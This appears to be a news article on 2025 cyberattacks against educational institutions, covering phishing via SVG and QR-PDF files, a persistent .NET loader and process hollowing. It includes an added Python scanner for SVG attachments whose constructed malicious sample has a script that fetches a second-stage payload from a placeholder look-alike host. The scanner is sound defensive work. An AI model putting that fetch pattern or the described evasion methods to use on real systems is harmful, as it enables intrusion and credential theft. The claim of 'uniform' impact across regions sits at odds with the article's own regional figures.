Increase in Cyber Assaults on Educational Institutions Observed Post Summer Break
In the first seven months of 2025, the education sector has encountered a significant increase in cyber attacks, with Italy leading the pack at 8,593 attacks per organization, followed closely by Hong Kong, Portugal, and the United States.
The malware responsible for these attacks is a .NET executable that decrypts in memory and drops a lightweight malware loader into the Windows Startup folder for persistence. The malware's multi-stage process is designed for persistence and evasion, making it difficult for security systems to detect and neutralize.
The malware is often delivered via seemingly benign SVG attachments or QR-encoded PDF forms, enabling credential theft and the deployment of secondary loaders. This could further compromise networks and exfiltrate sensitive data.
Detection evasion is achieved using process hollowing, where the loader spawns a legitimate process (e.g., svchost[.]exe), unmaps its memory, and injects malicious code into the hollowed instance.
The emergence of themed phishing campaigns timed to the back-to-school rush has amplified both the volume and sophistication of these threats. Check Point analysts have noted that the scale and timing of these surges indicate attackers are leveraging the seasonal spike in digital activity to maximize impact and evade detection.
The United States recorded more attacks on educational institutions than any other single country from January to July 2025, with incidents reported across multiple states including California, Alabama, and Tennessee.
North America saw the steepest spike, rising 67 percent year-over-year, while Europe and Africa recorded increases of 48 percent and 56 percent respectively. Asia-Pacific organizations faced the heaviest onslaught, with an average of 7,869 weekly attacks per organization.
The infection chain relies on a typo-squatted domain: when the SVG file is opened, its embedded JavaScript fetches a payload from that domain. Check Point researchers have identified multiple campaigns using this technique.
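Static triage of the SVG attachments described above (the delivery vector and the embedded-JavaScript fetch) can be done at the mail gateway before any viewer executes the file. The following is an added example, not code from the Check Point report or from the campaign: it flags embedded script elements, event-handler attributes such as onload, and references to hosts outside an allow-list. Both sample SVGs are constructed, and the look-alike host in the second one is a placeholder.

```python
"""Static triage of SVG e-mail attachments (added example, constructed samples)."""
import re
import xml.etree.ElementTree as ET  # for untrusted input in production prefer defusedxml
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample: a plain logo with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect width="10" height="10" fill="#036"/>
</svg>"""

# Constructed sample: an onload handler plus a script that pulls a second stage
# from a placeholder look-alike host.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="init()">
  <script type="text/javascript"><![CDATA[
    function init() { fetch("https://micros0ft-login.example/stage2"); }
  ]]></script>
  <text x="1" y="5">Open attachment</text>
</svg>"""

URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


@dataclass
class SvgFindings:
    script_elements: int = 0
    event_handlers: list = field(default_factory=list)
    external_hosts: set = field(default_factory=set)

    @property
    def suspicious(self) -> bool:
        return bool(self.script_elements or self.event_handlers or self.external_hosts)


def local_name(qualified: str) -> str:
    """Strip an ElementTree '{namespace}' prefix from a tag or attribute name."""
    return qualified.rsplit("}", 1)[-1]


def _note_host(findings: SvgFindings, url: str, allowed) -> None:
    """Record the host of a URL unless it is on the allow-list."""
    host = urlparse(url).hostname
    if host and host.lower() not in allowed:
        findings.external_hosts.add(host.lower())


def scan_svg(data: bytes, allowed_hosts=frozenset({"www.w3.org"})) -> SvgFindings:
    """Walk every element; record script elements, on* attributes and foreign hosts."""
    findings = SvgFindings()
    root = ET.fromstring(data)
    for el in root.iter():
        if local_name(el.tag).lower() == "script":
            findings.script_elements += 1
        for attr, value in el.attrib.items():
            name = local_name(attr).lower()
            if name.startswith("on"):   # onload, onclick, onerror, ...
                findings.event_handlers.append(name)
            if name == "href":          # plain href or xlink:href
                _note_host(findings, value, allowed_hosts)
        # URLs hidden inside script bodies or text nodes
        for chunk in (el.text or "", el.tail or ""):
            for url in URL_RE.findall(chunk):
                _note_host(findings, url, allowed_hosts)
    return findings


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        result = scan_svg(blob)
        print(label, "suspicious" if result.suspicious else "clean", result)
```

A gateway would normally quarantine any SVG for which `suspicious` is true, since a legitimate logo or diagram has no reason to carry script, event handlers, or references to arbitrary hosts; the allow-list exists only for namespace-style references such as www.w3.org.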
From January to July 2025, organizations in the education sector experienced an average of 4,356 weekly cyber attacks, marking a 41 percent year-over-year increase. The attacks range from credential-harvesting phishing domains to sophisticated delivery of malicious code aimed at compromising networks and exfiltrating sensitive data.
The impersonation domains often host pages that mimic Microsoft's login interface. In July alone, over 18,000 new domains mimicking academic institutions were registered, with one in every 57 flagged as malicious or suspicious.
These attacks have struck uniformly across all regions, underscoring the global nature of this cyber threat. As the new academic year begins, it is crucial for educational institutions to strengthen their cybersecurity measures to protect against these increasingly sophisticated attacks.